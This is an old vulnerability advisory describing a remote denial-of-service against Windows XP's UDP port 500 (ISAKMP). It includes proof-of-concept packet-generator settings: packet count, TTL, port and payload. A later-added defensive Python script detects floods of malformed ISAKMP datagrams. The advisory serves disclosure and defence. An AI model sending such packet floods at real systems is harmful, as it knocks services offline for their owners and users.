XP DoS
Affected : Windows XP default install with UDP 500
open :
Type : Remote DoS attack with UDP packets. Drives the CPU to 100 % :
Date : 15-02-2002 :
Author : NtWaK0 @ www.SafeHack.com :
+-----------------------------------------------------------------------.
:
+----------------.
Remote/Local DOS \
+------------------`----------------------------------------------------.
:
+-----------. :
Disclaimer \ :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on :
experiments though it may be false. The opinions expressed in this :
advisory and program are my own and NOT of any company. :
In fact, I do not work for anyone at the present time. :
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. So, don't shoot the messenger. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------. :
T.O.C. \ :
+---------`-------------------------------------------------------------.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 42 ]:
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 59 ]:
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 122 ]:
:
+-------------. :
Brief History \ :
+---------------`-------------------------------------------------------.
UDP port 500 is open by default on a freshly installed XP box. :
The attack is serious since it works remotely and can drive the CPU to 100 % :
in less than 20 seconds. The CPU utilisation stays normal for 10 seconds :
or so and then it jumps in one shot to 100 %. :
To learn more about Windows XP please visit: :
http://www.microsoft.com :
:
YES, YOU HAVE GUESSED IT, ENGLISH IS NOT MY MOTHER LANGUAGE -:) :
+---------------------------+ :
>>> Test OS Applications <<< :
+---------------------------+ :
Tested on Windows XP :
Default Install with default ports :
:
+-----------. :
The Problem \ :
+-------------`---------------------------------------------------------.
What is Port 500 ISAKMP ? :
========================= :
:
[Extracted From http://www.networkice.com/advice/Exploits/Ports] :
Port 500 ISAKMP, pluto :
Internet Security Association and Key Management Protocol (ISAKMP) :
This port is available on most systems that support IPsec. Many IPsec- :
compatible VPN providers use this port, such as Nortel/Bay Networks :
Extranet Access Client. See : RFC2408 :
:
If an attacker targets your Windows XP port 500 UDP they can cause 100 % :
CPU utilisation in less than 40 seconds. :
The speed while sending the packets was 20 K upload, sometimes less than :
18 K [Based on DU-Meter] :
:
The target machine is a Windows XP with 240 RAM. :
:
I could not do any task on the XP machine until I stopped sending packets.:
:
I can see this as a serious problem if you are using Windows XP default:
:
Imagine someone is attacking your Windows XP from 1000 zombies. I am :
not sure if your Windows XP won't crash. :
:
Like I said, I sent a couple of packets and the CPU jumped in less than :
40 sec to 100 %. Soon I am going to do more tests. :
:
:
+-----------------------------------------+ :
>>> Proof-Of-Concept-Packet-Information <<< :
+-----------------------------------------+ :
[IP] :
SourceAddress= :
SourcePort=1 :
DestinationAddress= :
DestinationPort=500 :
HeaderSize=20 :
SpecifyHeaderSize=0 :
Identification=0 :
SpecifyIdentification=0 :
Checksum=0 :
SpecifyChecksum=0 :
TypeService=0 :
FragmentationType=2 :
DataSize=32 :
Offset=0 :
TTL=1 :
:
[Commands] :
NbPackets=3000 :
PacketType=1 :
:
[UDP] :
Checksum=0 :
SpecifyUDPChecksum=0 :
Data=xffxffxffxffxffxffxffxffxffffx00 :
:
........................................................................:
........................................................................:
:
+------------. :
The Solution \ :
+--------------`--------------------------------------------------------.
Vendor should be informed...I guess Microsoft reads SecurityFocus too :
Filter UDP 500 and other UNUSED ports. Stop Unused Services :
+-----------------------------------------------------------------------.
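For defenders who must leave UDP 500 reachable, a monitoring-side check is sketched here as an added example, not part of the original advisory: it validates each datagram seen on UDP 500 against the fixed 28-byte ISAKMP header from RFC 2408 and flags sources that send many malformed ones in a short window. The function names, the 10-second window, the threshold of 100 and the sample addresses are assumptions chosen for illustration.

```python
import struct
from collections import defaultdict, deque

# ISAKMP fixed header, RFC 2408 section 3.1: two 8-byte cookies, next payload,
# version (major/minor nibbles), exchange type, flags, message ID, total length.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")  # 28 bytes

def isakmp_problem(datagram):
    """Return None if the header is plausible, else a short reason string."""
    if len(datagram) < ISAKMP_HDR.size:
        return "shorter than 28-byte ISAKMP header"
    fields = ISAKMP_HDR.unpack_from(datagram)
    version, length = fields[3], fields[7]
    if version >> 4 not in (1, 2):  # assumption: only IKEv1/IKEv2 peers expected
        return "unknown major version %d" % (version >> 4)
    if length != len(datagram):
        return "length field %d != datagram size %d" % (length, len(datagram))
    return None

def flood_suspects(events, window=10.0, threshold=100):
    """events: time-ordered (timestamp_s, src_ip, udp_payload) seen on UDP 500.
    Returns sources with more than `threshold` malformed datagrams in `window` s."""
    recent = defaultdict(deque)
    suspects = set()
    for ts, src, payload in events:
        if isakmp_problem(payload) is None:
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            suspects.add(src)
    return sorted(suspects)

# Constructed sample data (documentation addresses, not from the advisory).
VALID = ISAKMP_HDR.pack(b"\x11" * 8, b"\x00" * 8, 0, 0x10, 2, 0, 0, 28)
JUNK = b"\xff" * 32  # 32 bytes of filler that is not an ISAKMP message
SAMPLE_EVENTS = [(i * 0.01, "192.0.2.10", JUNK) for i in range(300)]
SAMPLE_EVENTS.append((3.5, "198.51.100.7", VALID))

if __name__ == "__main__":
    print(isakmp_problem(JUNK))
    print(flood_suspects(SAMPLE_EVENTS))
```

Sources returned by `flood_suspects` are candidates for the UDP 500 filter recommended above.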